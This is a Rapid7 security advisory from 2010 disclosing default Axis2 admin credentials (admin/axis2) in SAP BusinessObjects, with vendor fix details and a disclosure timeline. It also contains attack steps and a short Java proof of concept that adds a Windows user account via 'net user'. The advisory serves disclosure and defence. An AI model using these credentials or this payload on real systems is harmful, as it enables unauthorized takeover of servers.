Rapid7 Security Advisory 37

`R7-0037: SAP BusinessObjects Axis2 Default Admin Password  
October 13th, 2010  
  
Description:  
  
The SAP BusinessObjects product contains a module (dswsbobje.war) which  
deploys Axis2 with an administrator account which is configured with a  
static password. As a result, anyone with access to the Axis2 port can  
gain full access to the machine via arbitrary remote code execution.  
This requires the attacker to upload a malicious web service and to  
restart the instance of Tomcat. This issue may apply to other products  
and vendors that embed the Axis2 component. The username is "admin" and  
the password is "axis2", this is also the default for standalone Axis2  
installations.  
  
Impact:  
  
An attacker can execute arbitrary code by creating a malicious web  
service (jar). The attacker can log in to the Axis2 component with the  
default admin account, upload the malicious web service, and upon  
restart the malicious code will be executed.  
  
Proof of Concept Code:  
  
Create a webservice (jar) which contains malicious code. Login to Axis2  
and upload the web service. Restart Tomcat and the malicious code will  
execute once Axis2 is loaded.  
  
package org.apache.axis2.axis2userguide; import java.io.IOException;  
public class AddUser {  
public AddUser() {  
Process process;  
try {  
process = Runtime.getRuntime().exec("net user foo bar /add");  
}  
catch(IOException ioexception) {  
ioexception.printStackTrace();  
}  
}  
public void main() {  
return;  
}  
}  
  
CVE: CVE-2010-0219  
  
Vendor Response:  
  
A fix has been provided on the SAP customer support site: SAP Security  
Note 1432881. Please note that this site requires authentication.  
  
References:  
  
http://spl0it.org/files/talks/source_barcelona10/Hacking%20SAP%20BusinessObjects.pdf  
http://www.kb.cert.org/vuls/id/989719  
  
Disclosure Timeline:  
  
2010-08-12 - Vulnerability reported to the vendor via email  
2010-08-12 - Vendor confirmed the vulnerability  
2010-09-02 - Vulnerability reported to CERT  
2010-10-13 - Coordinated public release of advisory  
  
Credit:  
  
This vulnerability was reported by Joshua Abraham and Will Vandevanter.  
  
About Rapid7 Security:  
  
Rapid7 provides vulnerability management, compliance and penetration  
testing solutions for Web application, network and database security. In  
addition to developing the NeXpose Vulnerability Management system,  
Rapid7 manages the Metasploit Project and is the primary sponsor of the  
W3AF web assessment tool.  
  
Our vulnerability disclosure policy is available online at:  
  
http://www.rapid7.com/disclosure.jsp  
`